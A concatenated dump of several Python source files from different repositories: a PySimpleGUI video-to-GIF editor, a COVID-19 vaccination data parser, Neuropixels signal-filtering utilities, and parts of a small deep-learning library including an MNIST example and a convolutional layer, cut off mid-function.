sg.In(size=(25, 1), enable_events=True, visible=False, key="Save GIF"),
sg.FileSaveAs(button_text = "Save GIF", initial_folder='./', file_types = (('GIF', '*.gif'),)),
sg.In(size=(25, 1), enable_events=True, visible=False, key="Save PNG"),
sg.FileSaveAs(button_text = "Save PNG", initial_folder='./', file_types = (('PNG', '*.png'),))
]
]
# ----- Full layout -----
layout = [
[
sg.Column(transforms),
sg.VSeperator(),
sg.Column(image_viewer_column),
]
]
def image_2_bytes(image):
return cv2.imencode('.png', image[...,::-1])[1].tobytes()
def clip_image(clip,time):
image=clip.get_frame(time)
return cv2.imencode('.png', image[...,::-1])[1].tobytes()
window = sg.Window("Video to GIF", layout, return_keyboard_events=True, )
'''
window.bind("<Control-KeyPress-z>", "CTRL-Z")
window.bind("<Control-KeyPress-Z>", "CTRL-Z")
window.bind("<Control-KeyRelease-z>", "Release-Z")
window.bind("<Control-KeyRelease-Z>", "Release-Z")
window.bind("<Control-KeyPress-y>", "CTRL-Y")
window.bind("<Control-KeyPress-Y>", "CTRL-Y")
window.bind("<Control-KeyRelease-y>", "Release-Y")
window.bind("<Control-KeyRelease-Y>", "Release-Y")
ctrl_z_on = False
ctrl_y_on = False
'''
class Gif:
def __init__(self, file):
self.fullclip = VideoFileClip(file)
self.original_shape=self.fullclip.get_frame(0).shape
self.init_clip()
self.is_video_loaded=True
self.transforms=[]
self.transform_index=0
self.current_time=0
def init_clip(self):
self.clip=self.fullclip.copy()
if self.original_shape[0]>INITIAL_HEIGHT:
self.clip=self.clip.resize(height=INITIAL_HEIGHT)
self.image = self.clip.get_frame(0)
self.current_shape=self.image.shape
self.dur = self.clip.duration
self.fps=self.clip.fps
self.play_range=(0,self.dur)
def save_gif(self,filename):
if filename:
print('saving:', filename)
self.clip.write_gif(filename)
try:
from pygifsicle import optimize
optimize(filename)
except:
raise Warning('Error in pyfigsicle, not optimizing gif.')
def save_png(self,filename):
if filename:
print('saving:', filename)
self.clip.save_frame(filename, self.current_time)
def change_scale(self,value, release=None):
transform=('scale change',value)
if len(self.transforms)>0 and self.transforms[-1][0] == 'scale change': #only save last change
self.transforms[-1]=transform
else:
self.add_transform(transform)
self.apply_transform(transform)
self.current_shape=self.clip.get_frame(self.current_time).shape
#self.image=self.clip.get_frame(self.current_time)
def cut(self,start, end, inside=True):
if inside:
transform = ('cut inside',start, end)
else:
transform = ('cut outside',start, end)
self.apply_transform(transform)
self.add_transform(transform)
def flip(self,axis = 'x'):
transform = ('flip',axis)
self.apply_transform(transform)
self.add_transform(transform)
def rotate(self, positive = True):
if positive:
transform = ('rotate','90')
else:
transform = ('rotate','-90')
self.apply_transform(transform)
self.add_transform(transform)
def add_transform(self,transform):
self.transforms=self.transforms[0:self.transform_index]
self.transforms.append(transform)
self.transform_index+=1
print('TRANSFOR INDEX' ,gif.transform_index, gif.transforms)
def apply_transform(self,t):
if t[0]=='flip':
if t[1]=='x':
self.clip = self.clip.fx( vfx.mirror_x)
elif t[1]=='y':
self.clip = self.clip.fx( vfx.mirror_y)
else:
raise Error('Invalid transform')
elif t[0]=='rotate':
if t[1]=='90':
self.clip = self.clip.rotate(90)
elif t[1]=='-90':
self.clip = self.clip.rotate(90)
else:
raise Error('Invalid transform')
elif t[0] == 'scale change':
self.clip=self.fullclip.resize(height=t[1])
elif t[0] == 'cut inside':
self.clip=self.clip.subclip(t[1], t[2])
self.dur = self.clip.duration
self.play_range=(0,self.dur)
elif t[0] == 'cut outside':
clip1=self.clip.subclip(0, t[1])
clip2=self.clip.subclip(t[2], self.clip.duration)
self.clip=concatenate_videoclips([clip1,clip2], method='compose')
self.dur = self.clip.duration
self.play_range=(0,self.dur)
def apply_transform_list(self):
#clip=fullclip.copy()
self.init_clip()
if len(self.transforms)<=0:
return
# the only scaling applied is the last one
scale_change_indexes=[loc for loc, t in enumerate(self.transforms) if t[0] == 'scale change']
if len(scale_change_indexes)>0:
last_scale_index = max(scale_change_indexes)
self.apply_transform(self.transforms[last_scale_index])
else:
self.init_clip()
trans = [t for t in self.transforms[0:self.transform_index] if t[0] != 'scale change']
print(trans)
for t in trans:
print(t)
self.apply_transform(t)
def undo(self):
self.transform_index=max(self.transform_index-1,0)
self.apply_transform_list()
print('TRANSFOR INDEX', gif.transform_index, gif.transforms)
def redo(self):
self.transform_index=min(self.transform_index+1,len(self.transforms))
self.apply_transform_list()
print('TRANSFOR INDEX', gif.transform_index, gif.transforms)
def display(self):
return clip_image(self.clip,self.current_time)
def update_bars(gif, window):
window.Element("scale_slider").Update(range=(30,gif.original_shape[0]), value=0)
window["scale_slider"].update(value=gif.current_shape[0])
window.Element("start_slider").Update(range=(0,gif.dur), value=0)#, tick_interval=dur/10)
window["start_slider"].update(value=0)
window.Element("end_slider").Update(range=(0,gif.dur), value=0)#, tick_interval=dur/10)
window["end_slider"].update(value=gif.dur)
window.Element("trackbar").Update(range=(0,gif.dur), value=0)#, tick_interval=dur/10)
window["trackbar"].update(value=0)
window["-IMAGE-"].update(gif.display())
playing = False
paused=False
play_time = 0.0
play_start_time = 0.0
is_video_loaded=False
square=(0,0,0,0)
#list of tuples
transforms=[]
transform_index=0
# Run the Event Loop
while True:
# Timeout set only when playing the video.
if not playing:
event, values = window.read()
else:
if is_video_loaded:
event, values = window.read(timeout = 1000/gif.fps)
if event == "Exit" or event == sg.WIN_CLOSED:
break
# Load video
if event == "Load/Reload Video" and values["-VIDEO-SELECTED-"].endswith('.mp4'):
playing=False
window['Play'].update('Play')
file = values["-VIDEO-SELECTED-"]
try:
gif=Gif(file)
is_video_loaded=gif.is_video_loaded
except:
raise Warning("Error loading the file")
break
update_bars(gif,window)
elif event == 'Save GIF' and is_video_loaded:
filename = values['Save GIF']
gif.save_gif(filename)
elif event == 'Save PNG' and is_video_loaded:
filename = values['Save PNG']
gif.save_png(filename)
# change scale
elif event == "scale_slider" and is_video_loaded:
gif.change_scale(values['scale_slider'])
window["-IMAGE-"].update(gif.display())
elif event == "start_slider" and is_video_loaded:
playing=False
window['Play'].update('Play')
gif.current_time=values['start_slider']
gif.play_range=(gif.current_time,values['end_slider'])
if gif.current_time > values["end_slider"]:
window["end_slider"].update(value=gif.current_time)
window["-IMAGE-"].update(gif.display())
elif event == "end_slider" and is_video_loaded:
playing=False
window['Play'].update('Play')
gif.current_time=values['end_slider']
gif.play_range=(values['start_slider'],gif.current_time)
if gif.current_time < values["start_slider"]:
window["start_slider"].update(value=gif.current_time)
window["-IMAGE-"].update(gif.display())
elif event == "trackbar" and is_video_loaded:
gif.current_time=values['trackbar']
window["-IMAGE-"].update(gif.display())
if playing:
playing=False
window['Play'].update('Play')
elif event == 'Cut inside' and is_video_loaded:
gif.cut(values['start_slider'],values['end_slider'], inside=True)
update_bars(gif, window)
elif event == 'Cut outside' and is_video_loaded:
gif.cut(values['start_slider'],values['end_slider'], inside=False)
update_bars(gif, window)
elif event == 'Flip x' and is_video_loaded:
gif.flip(axis = 'x')
window["-IMAGE-"].update(gif.display())
elif event == 'Flip y' and is_video_loaded:
gif.flip(axis = 'y')
window["-IMAGE-"].update(gif.display())
elif event == 'Rotate 90' and is_video_loaded:
gif.rotate(positive=True)
window["-IMAGE-"].update(gif.display())
elif event == 'Rotate -90' and is_video_loaded:
gif.rotate(positive=False)
window["-IMAGE-"].update(gif.display())
# TODO: solve to correctly disable undo button
elif event == 'Undo' and gif.transform_index > 0 and is_video_loaded:
#window['Undo'].update(disabled = (transform_index == 0) )
#window['Redo'].update(disabled = (transform_index == len(transforms)-1) or len(transforms) == 0)
gif.undo()
update_bars(gif, window)
window["-IMAGE-"].update(gif.display())
elif event == 'Redo' and gif.transform_index < len(gif.transforms) and is_video_loaded:
#window['Undo'].update(disabled = (transform_index == 0) )
#window['Redo'].update(disabled = (transform_index == len(transforms)-1) or len(transforms) == 0)
gif.redo()
gif.display()
update_bars(gif, window)
window["-IMAGE-"].update(gif.display())
elif event == 'Play' and is_video_loaded:
if playing:
window['Play'].update('Play')
playing=False
else:
window['Play'].update('Pause')
playing=True
play_time=time.time()
play_start_time=values['trackbar']
paused=False
elif event == 'Stop' and is_video_loaded:
window['Play'].update('Play')
playing=False
window["-IMAGE-"].update(gif.display())
window["trackbar"].update(0)
#print(event,values)
if not event=='__TIMEOUT__' and is_video_loaded:
window['Undo'].update(disabled = (gif.transform_index == 0) )
window['Redo'].update(disabled = (gif.transform_index >= len(gif.transforms)))
''' TODO: control Z
elif (event == "CTRL-B" and not ctrl_z_on):
ctrl_z_on == True
elif event == "Release-B":
ctrl_z_on = False
'''
''' TODO: pause button
elif event == 'Pause':
if playing:
playing=False
paused=True
if paused:
playing=True
paused=False
'''
#play the video
if is_video_loaded and playing:
trackbar_time=(time.time()-play_time)+play_start_time
if trackbar_time < gif.play_range[1]:
window["trackbar"].update(value=trackbar_time)
window["-IMAGE-"].update(gif.display())
gif.current_time=trackbar_time
else:
playing=False
window['Play'].update('Play')
#window['Pause'].update(disabled=paused)
#print(transforms)
window.close()
``` |
{
"source": "jonathanamar-v/covid-19-open-data",
"score": 2
} |
#### File: pipelines/vaccinations/in_covid19india_org.py
```python
from typing import Dict
from pandas import DataFrame, melt
from lib.data_source import DataSource
from lib.time import datetime_isoformat
from lib.utils import table_merge
from lib.metadata_utils import country_subregion1s
class Covid19IndiaOrgL1DataSource(DataSource):
def parse_dataframes(
self, dataframes: Dict[str, DataFrame], aux: Dict[str, DataFrame], **parse_opts
) -> DataFrame:
data = dataframes[0]
# Flatten the table
data = melt(data, id_vars=["State"], var_name="date", value_name='total_vaccine_doses_administered')
data.date = data.date.apply(lambda x: datetime_isoformat(x, "%d/%m/%Y"))
# add location keys
subregion1s = country_subregion1s(aux["metadata"], "IN")
data = table_merge(
[data, subregion1s[['key', 'subregion1_name']]],
left_on="State", right_on='subregion1_name', how="inner")
return data
``` |
{
"source": "JonathanAMichaels/NeuropixelsRegistration",
"score": 2
} |
#### File: NeuropixelsRegistration/python/utils.py
```python
import numpy as np
from scipy.io import loadmat
import os
import logging
from scipy.signal import butter, filtfilt
def mat2npy(mat_chanmap_dir):
mat_chanmap = loadmat(mat_chanmap_dir)
x = mat_chanmap['xcoords']
y = mat_chanmap['ycoords']
npy_chanmap = np.hstack([x,y])
#np.save('chanmap.npy', npy_chanmap) # you can't just go saving this wherever
return npy_chanmap
def merge_filtered_files(filtered_location, output_directory, delete=True):
filenames = os.listdir(filtered_location)
filenames_sorted = sorted(filenames)
f_out = os.path.join(output_directory, "standardized.bin")
f = open(f_out, 'wb')
for fname in filenames_sorted:
if '.ipynb' in fname or 'standardized' in fname:
continue
res = np.load(os.path.join(filtered_location, fname)).astype('int16') # was float32
res.tofile(f)
if delete:
os.remove(os.path.join(filtered_location, fname))
# Added functions from yass to avoid mandatory yass install
"""
Filtering functions
"""
def _butterworth(ts, low_frequency, high_factor, order, sampling_frequency):
"""Butterworth filter
Parameters
----------
ts: np.array
T numpy array, where T is the number of time samples
low_frequency: int
Low pass frequency (Hz)
high_factor: float
High pass factor (proportion of sampling rate)
order: int
Order of Butterworth filter
sampling_frequency: int
Sampling frequency (Hz)
Notes
-----
This function can only be applied to a one dimensional array, to apply
it to multiple channels use butterworth
Raises
------
NotImplementedError
If a multidmensional array is passed
"""
low = float(low_frequency) / sampling_frequency * 2
high = float(high_factor) * 2
b, a = butter(order, low, btype='high', analog=False)
if ts.ndim == 1:
return filtfilt(b, a, ts)
else:
T, C = ts.shape
output = np.zeros((T, C), 'float32')
for c in range(C):
output[:, c] = filtfilt(b, a, ts[:, c])
return output
def _mean_standard_deviation(rec, centered=False):
"""Determine standard deviation of noise in each channel
Parameters
----------
rec : matrix [length of recording, number of channels]
centered : bool
if not standardized, center it
Returns
-------
sd : vector [number of channels]
standard deviation in each channel
"""
# find standard deviation using robust method
if not centered:
centers = np.mean(rec, axis=0)
rec = rec - centers[None]
else:
centers = np.zeros(rec.shape[1], 'float32')
return np.median(np.abs(rec), 0) / 0.6745, centers
def _standardize(rec, sd=None, centers=None):
"""Determine standard deviation of noise in each channel
Parameters
----------
rec : matrix [length of recording, number of channels]
recording
sd : vector [number of chnanels,]
standard deviation
centered : bool
if not standardized, center it
Returns
-------
matrix [length of recording, number of channels]
standardized recording
"""
# find standard deviation using robust method
if (sd is None) or (centers is None):
sd, centers = _mean_standard_deviation(rec, centered=False)
# standardize all channels with SD> 0.1 (Voltage?) units
# Cat: TODO: ensure that this is actually correct for all types of channels
idx1 = np.where(sd >= 0.1)[0]
rec[:, idx1] = np.divide(rec[:, idx1] - centers[idx1][None], sd[idx1])
# zero out bad channels
idx2 = np.where(sd < 0.1)[0]
rec[:, idx2] = 0.
return rec
# return np.divide(rec, sd)
def filter_standardize_batch(batch_id, reader, fname_mean_sd,
apply_filter, out_dtype, output_directory,
low_frequency=None, high_factor=None,
order=None, sampling_frequency=None):
"""Butterworth filter for a one dimensional time series
Parameters
----------
ts: np.array
T numpy array, where T is the number of time samples
low_frequency: int
Low pass frequency (Hz)
high_factor: float
High pass factor (proportion of sampling rate)
order: int
Order of Butterworth filter
sampling_frequency: int
Sampling frequency (Hz)
Notes
-----
This function can only be applied to a one dimensional array, to apply
it to multiple channels use butterworth
Raises
------
NotImplementedError
If a multidmensional array is passed
"""
logger = logging.getLogger(__name__)
# filter
if apply_filter:
# read a batch
ts = reader.read_data_batch(batch_id, add_buffer=True)
ts = _butterworth(ts, low_frequency, high_factor,
order, sampling_frequency)
ts = ts[reader.buffer:-reader.buffer]
else:
ts = reader.read_data_batch(batch_id, add_buffer=False)
# standardize
temp = np.load(fname_mean_sd)
sd = temp['sd']
centers = temp['centers']
ts = _standardize(ts, sd, centers)
# save
fname = os.path.join(
output_directory,
"standardized_{}.npy".format(
str(batch_id).zfill(6)))
np.save(fname, ts.astype(out_dtype))
# fname = os.path.join(
# output_directory,
# "standardized_{}.bin".format(
# str(batch_id).zfill(6)))
# f = open(fname, 'wb')
# f.write(ts.astype(out_dtype))
def get_std(ts,
sampling_frequency,
fname,
apply_filter=False,
low_frequency=None,
high_factor=None,
order=None):
"""Butterworth filter for a one dimensional time series
Parameters
----------
ts: np.array
T numpy array, where T is the number of time samples
low_frequency: int
Low pass frequency (Hz)
high_factor: float
High pass factor (proportion of sampling rate)
order: int
Order of Butterworth filter
sampling_frequency: int
Sampling frequency (Hz)
Notes
-----
This function can only be applied to a one dimensional array, to apply
it to multiple channels use butterworth
Raises
------
NotImplementedError
If a multidmensional array is passed
"""
# filter
if apply_filter:
ts = _butterworth(ts, low_frequency, high_factor,
order, sampling_frequency)
# standardize
sd, centers = _mean_standard_deviation(ts)
# save
np.savez(fname,
centers=centers,
sd=sd)
``` |
{
"source": "Jonathan-Andrews/dlmb",
"score": 3
} |
#### File: dlmb/examples/mnist_example.py
```python
import os
import tensorflow as tf
import numpy as np
from models import Sequential
from layers import Dense, Batchnorm
def prepare_data():
# Get the data from tensorflow
# mnist is a data set of 60000 different 28*28 hand written digit images
# The hand written digits range from 0 - 9
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
# Set the shapes
# The data set originally comes in a (60000, 28, 28) sized array, where each 28 is either the rows or columns of the image
x_train = x_train.reshape((60000, 784))
x_test = x_test.reshape((10000, 784))
# Turn y_train into a one hot vector for softmax and crossentropy
# A one hot vector is a array filled with zeros except for a one in the index of the number in the array
# Example:
# [2, 4]
# 0 1 2 3 4 0 1 2 3 4
# [[0, 0, 1, 0, 0], [0, 0, 0, 0, 1]] (The first 0 in each array is the zeroth index)
y_train = np.eye(np.max(y_train) + 1)[y_train]
# Normalize X.
# We normalize the data to help the model learn better
# A pixel in the image has a value ranging from 0 - 255, so dividing by 255 normalizes the data between 0 and 1
x_train = x_train / 255
x_test = x_test / 255
return x_train, y_train, x_test, y_test
def validate_model(predictions, labels):
correct = 0
for i in range(len(predictions)):
guess = np.where(predictions[i] == np.max(predictions[i]))
if guess[0] == labels[i]: # Compare the models output to the correct output
correct += 1
return correct
def run():
file_path = os.path.dirname(os.path.realpath(__file__)) + "/dlmb_mnist_example.json"
# If a file of the neural-net model's architexture already exists,
# then there is no need to build a new model.
if os.path.isfile(file_path):
# load the model and get its predictions based on x_test
nn_model = Sequential()
nn_model.load(file_path)
predictions = nn_model.predict(x_test)
# compare the predictions to the correct labels
print(f"This model got a {validate_model(predictions, y_test)/100}% accuracy")
# If the file doesn't exist then we need to build a neural-net model and train it.
else:
# Build the neural-net model
nn_model = Sequential([
Dense(128, 784, activation="ReLU"), # for the layer_dim we want 128 outputs and 784 inputs (each pixel on the image)
Batchnorm(128),
Dense(128, 128, activation="ReLU"),
Batchnorm(128),
Dense(32, 128, activation="ReLU"),
Batchnorm(32),
Dense(10, 32, activation="Softmax") # We have 10 nodes in the layer for each number from 0 - 9
])
nn_model.build(loss="crossentropy", optimizer="adam")
# Crossentropy is a good loss function when you are doing logistic regression (classification)
# Adam is one of the most popular optimizers
nn_model.train(x_train, y_train, epochs=10, batch_size=1000)
# Train the model
# We go through the data 10 times and split the data of 60000 samples into 1000 sized batches leaving 60 samples
# Now we save the model so we can use it again without re-training
nn_model.save(file_path) # When saving, files must end in .json
x_train, y_train, x_test, y_test = prepare_data()
```
#### File: dlmb/dlmb/initializers.py
```python
import numpy as np
from utils.function_helpers import *
@accepts(shape=tuple)
def zeros(shape) -> np.ndarray:
"""
Creates a numpy array of shape shape filled with values of 0.
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A numpy array filled with values of 0.
"""
return np.zeros(shape)
@accepts(shape=tuple)
def ones(shape) -> np.ndarray:
"""
Creates a numpy array of shape shape filled with values of 1.
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : Numpy array : A numpy array filled with values of 1.
"""
return np.ones(shape)
@accepts(shape=tuple)
def random(shape) -> np.ndarray:
"""
Creates a numpy array of shape shape filled with random values between 0 and 1.
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A numpy array filled with random values between 0 and 1.
"""
return np.random.random(shape)
@accepts(shape=tuple)
def uniform(shape) -> np.ndarray:
"""
Creates a uniform numpy array with boundaries of [-1/sqrt(n), 1/sqrt(n)].
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
boundaries = 1/np.sqrt(shape[1])
return np.random.uniform(-boundaries, boundaries, shape)
@accepts(shape=tuple)
def xavier(shape) -> np.ndarray:
"""
Creates a gaussian distribution numpy array with a mean of 0 and variance of sqrt(2/(n+m)).
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
return np.random.normal(0, np.sqrt(2/(shape[0]+shape[1])), shape)
@accepts(shape=tuple)
def xavier_uniform(shape) -> np.ndarray:
"""
Creates a uniform numpy array based of the xavier initializer with boundaries of [-sqrt(6)/sqrt(n+m), sqrt(6)/sqrt(n+m)].
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
boundaries = np.sqrt(6)/np.sqrt(shape[0]+shape[1])
return np.random.uniform(-boundaries, boundaries, shape)
@accepts(shape=tuple)
def sigmoid_uniform(shape) -> np.ndarray:
"""
Creates a uniform numpy array based of the xavier_uniform initializer with boundaries of [-(4*sqrt(6))/sqrt(n+m), 4*sqrt(6)/sqrt(n+m)].
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
boundaries = 4*np.sqrt(6)/np.sqrt(shape[0]+shape[1])
return np.random.uniform(-boundaries, boundaries, shape)
@accepts(shape=tuple)
def relu(shape) -> np.ndarray:
"""
Creates a gaussian distribution numpy array with a mean of 0 and variance of sqrt(2/m).
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
return np.random.normal(0, np.sqrt(2/shape[1]), shape)
@accepts(shape=tuple)
def relu_uniform(shape):
"""
Creates a uniform numpy array based of the relu initializer with boundaries of [-sqrt(6/m), sqrt(6/m)].
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
boundaries = np.sqrt(6/shape[1])
return np.random.uniform(-boundaries, boundaries, shape)
def get(initializer):
"""
Finds and returns the correct initializer function.
Arguments:
initializer : str/callable : The initializer function.
Returns:
initializer : callable : The correct initializer function.
"""
if type(initializer) == str:
if initializer.lower() in ("zeros", "zero"):
return zeros
elif initializer.lower() in ("ones", "one"):
return ones
elif initializer.lower() in ("random"):
return random
elif initializer.lower() in ("uniform"):
return uniform
elif initializer.lower() in ("xavier", "glorot"):
return xavier
elif initializer.lower() in ("xavier_uniform", "glorot_uniform"):
return xavier_uniform
elif initializer.lower() in ("sigmoid_uniform"):
return sigmoid_uniform
elif initializer.lower() in ("relu"):
return relu
elif initializer.lower() in ("relu_uniform"):
return relu_uniform
else:
print("'%s' is not currently an available initializer function. Has been set to 'uniform' by default" % initializer)
return uniform
else:
return initializer
```
#### File: dlmb/layers/base_layer.py
```python
from abc import ABCMeta, abstractmethod
import numpy as np
import optimizers as op
class Base_Layer(metaclass=ABCMeta):
@abstractmethod
def __init__(self, name:str, **kwargs) -> None:
"""
The Base_Layer class is an abstract class for all neural-net layers.
All neural-net layers must inherit from Base_layer.
"""
self.name = name
@abstractmethod
def build(self) -> None:
"""
Sets all of the vars that will be used in the layer.
"""
pass
@abstractmethod
def get_summary(self, with_vars:bool) -> dict:
"""
get_summary() returns a summary of the layers features.
Arguments:
with_vars : bool : If True, get_summary() includes the layer's variables' values in the summary.
Returns:
summary : dict : A dictonary of the layers features.
"""
return summary
@abstractmethod
def load(self, layer_data:dict) -> None:
"""
Takes the layer_data from the model this layer belongs to, and sets all vars equal to each key in layer_data.
Arguments:
layer_data : dict : A dictonary of saved vars from when this layer was first built and then saved.
"""
pass
@abstractmethod
def map_data(self, data:np.ndarray) -> np.ndarray:
"""
Maps the data from the previous layer to an output.
Arguments:
data : np.ndarray : An n dimensional numpy array containing real numbers passed from the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array of outputs from this layer.
"""
return output
@abstractmethod
def calculate_gradients(self, error:np.ndarray) -> np.ndarray:
"""
Calculates the derivatives of the error from the previous layer W.R.T each trainable var in this layer.
Arguments:
error : np.ndarray : An n dimensional numpy array containing the errors for the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array containing the errors for this layer.
"""
return layer_error
@abstractmethod
def update_vars(self, optimizer:op.Base_Optimizer, epoch:int) -> None:
"""
Updates all the trainable vars with the previously calculated gradients.
Arguments:
optimizer : Base_Optimizer : The optimization function the user wants to use.
epoch : int : The current epoch or time step the model is at.
"""
pass
```
#### File: dlmb/layers/conv.py
```python
from layers.base_layer import *
from utils import *
import activations as a
import initializers as i
class Conv(Base_Layer):
@accepts(self="any", output_size=int, input_shape=tuple, activation=(a.Base_Activation, str),
bias_type=str, trainable=bool, filter_size=(tuple,int), stride=(tuple,int), padding=int,
weight_initializer=str, bias_initializer=str)
def __init__(self, output_size, input_shape, activation="relu", bias_type="per_node",
trainable=True, filter_size=(1,1), stride=(1,1), padding=0,
weight_initializer="random", bias_initializer="random") -> None:
"""
The conv layer or convolutional layer creates a numpy array that is convolved or cross-correlated over some data.
The conv layer also makes use of shared variables, meaning that compared to a dense layer there will be less variables.
Arguments:
output_size : int : An int of the output size, (E.X output_size=6 returns a numpy array of size
- [batch_size, ..., 6] "an image with 6 channels").
input_shape : tuple : A tuple of the input shape, (E.X input_shape=(28, 28, 1) which in this example is a 28*28 image with 1 channel).
activation : Base_Activation/str : A mathematical function that generally applies a non-linear mapping to some data.
bias_type : str : Has three settings, per_node (a bias with weights for every output),
- single (one bias weight for all outputs), none (no bias is used).
trainable : bool : If True, the vars in this layer will update based on the calculated loss of this layer W.R.T the vars.
filter_size : tuple/int : A tuple of 2 values or a int specifying the height and width of each segment of data that will be convolved over.
stride : tuple/int : A tuple or int of values specifying the stride for the height and width when convolving over some data.
padding : int : An int specifying the amount of padding to be added around the input data.
weight_initializer : str : An initializer function to set the values for the weights.
bias_initializer : st : An initializer function to set the values for the bias'.
"""
super().__init__("Conv")
if len(input_shape) == 2:
if channels_first:
input_shape = (1, input_shape[0], input_shape[1])
else:
input_shape = (input_shape[0], input_shape[1], 1)
if isinstance(filter_size, int):
filter_size = (filter_size, filter_size)
if isinstance(stride, int):
stride = (stride, stride)
self.built = False
self.layer_shape = (output_size, input_shape)
self.activation = a.get(activation)
self.bias_type = bias_type
self.trainable = trainable
self.filter_size = filter_size
self.stride = stride
self.padding = padding
self.weight_initializer = weight_initializer
self.bias_initializer = bias_initializer
self.weights = 0
self.bias = 0
self.optimizations = {"weight":[0,0], "bias":[0,0]}
self.cached_data = {}
# Put this into it's own function called get_ouput_size()
# calculates the output sizes for the layer.
height_output_size = int((self.layer_shape[1][0]-self.filter_size[0] + (2*self.padding))/self.stride[0]) + 1
width_output_size = int((self.layer_shape[1][1]-self.filter_size[1] + (2*self.padding))/self.stride[1]) + 1
self.output_shape = (height_output_size, width_output_size, output_size)
def build(self) -> None:
"""
Sets the values for all of the vars that will be used.
Also sets the layers activation function if the user sent through a string as the argument.
"""
if not self.built:
# Set self.weights.
init_shape = (self.output_shape[2], self.filter_size[0]*self.filter_size[1]*self.layer_shape[1][2])
weight_shape = (self.output_shape[2], self.filter_size[0]*self.filter_size[1], self.layer_shape[1][2])
self.weights = i.get(self.weight_initializer)(weight_shape).reshape(weight_shape)
# Set self.bias.
self.bias = i.get(self.weight_initializer)((self.layer_shape[0], 1))
# Set self.bias based on self.bias_type.
if self.bias_type == "per_node":
self.bias = self.bias
elif self.bias_type == "single":
self.bias = self.bias[0]
elif self.bias_type == "none":
self.bias == np.array([[0]])
else:
print("At Conv.set_vars(): '%s' is not a valid bias_type. Has been set to 'per_node' by default" % self.bias_type)
self.built = True
@accepts(self="any", with_vars=bool)
def get_summary(self, with_vars) -> dict:
"""
get_summary() returns a summary of the layers features.
Arguments:
with_vars : bool : If True, get_summary() includes the layer's variables' values in the summary.
Returns:
summary : dict : A dictonary of the layers features.
"""
summary = {
"name":self.name,
"built":self.built,
"layer_shape":self.layer_shape,
"activation":self.activation.name,
"bias_type":self.bias_type,
"trainable":self.trainable,
"filter_size":self.filter_size,
"stride":self.stride,
"padding":self.padding,
"output_size":self.output_size,
"weight_initializer":self.weight_initializer,
"bias_initializer":self.bias_initializer,
"num_trainable_vars":(self.weights.shape[0]*self.weights.shape[1])+self.bias.shape[0]
}
if with_vars:
summary["weights"] = np.asarray(self.weights)
summary["bias"] = np.asarray(self.bias)
summary["optimizations"] = {key:np.asarray(self.optimizations[key]).tolist() for key in self.optimizations}
return summary
@accepts(self="any", layer_data=dict)
def load(self, layer_data) -> None:
"""
Takes the layer_data from the model this layer belongs to, and sets all vars equal to each key in layer_data.
Arguments:
layer_data : dict : A dictonary of saved vars from when this layer was first built and then saved.
"""
self.name = layer_data["name"]
self.built = layer_data["built"]
self.layer_shape = (layer_data["layer_shape"][0], tuple(layer_data["layer_shape"][1]))
self.activation = A.get(layer_data["activation"])
self.bias_type = layer_data["bias_type"]
self.trainable = layer_data["trainable"]
self.filter_size = layer_data["filter_size"]
self.stride = layer_data["stride"]
self.padding = layer_data["padding"]
self.output_size = layer_data["output_size"]
self.weight_initializer = layer_data["weight_initializer"]
self.bias_initializer = layer_data["bias_initializer"]
self.weights = np.asarray(layer_data["weights"])
self.bias = np.asarray(layer_data["bias"])
self.optimizations = {key:np.asarray(layer_data["optimizations"][key]) for key in layer_data["optimizations"]}
@accepts(self="any", data=np.ndarray)
def map_data(self, data) -> np.ndarray:
"""
Maps the data to an output by cross-correlating weights over the data.
Arguments:
data : np.ndarray : An n dimensional numpy array containing real numbers passed from the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array of outputs from this layer.
"""
d_shape = data.shape
# Turn the data into an easier to use shape.
if len(d_shape) == 2:
data = np.expand_dims(np.expand_dims(data, axis=0), axis=3)
elif len(d_shape) == 4:
data = data
else:
raise ValueError("At Conv.map_data(): Data with shape %s can not be used. Please reshape the data to a 2dim or 4dim sized numpy array." % d_shape)
# Store the current data and perform mathmatical operations to it.
self.cached_data["data"] = data
# Make sure the shape of the data matches this layers input_shape.
if data.shape[1:] == self.layer_shape[1]:
# Create a new numpy array to hold the mapped data.
self.cached_data["mapped_data"] = np.zeros((data.shape[0], self.output_shape[0], self.output_shape[1], self.output_shape[2]))
for segment, height, width, _, _ in get_segments(data, self.filter_size[0], self.filter_size[1], self.stride):
segment = np.expand_dims(segment.reshape(*segment.shape[:1], -1, *segment.shape[-1:]), axis=1)
self.cached_data["mapped_data"][0:, height, width, 0:] += np.sum(segment*self.weights, axis=(2,3))+self.bias.T
return self.activation.map_data(self.cached_data["mapped_data"])
else:
raise ValueError("At Conv.map_data(): Data with shape %s does not match this layers specified input_shape of %s" % (d_shape[1:], self.layer_shape[1]))
@accepts(self="any", error=np.ndarray)
def calculate_gradients(self, error) -> np.ndarray:
"""
Calculates the gradients of the error W.R.T each trainable var in the layer.
Arguments:
error : np.ndarray : An n dimensional numpy array containing the errors for the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array containing the errors for this layer.
"""
error = error.reshape((error.shape[0], self.output_shape[0], self.output_shape[1], self.output_shape[2]))
dO_dZ = self.activation.calculate_gradients(self.cached_data["mapped_data"])
node_errors = error*dO_dZ.reshape(error.shape)
# Calculate the weight gradients
self.optimizations["weight"][0] = np.zeros(self.weights.shape)
for segment, height, width, _, _ in get_segments(self.cached_data["data"], self.filter_size[0], self.filter_size[1], self.stride):
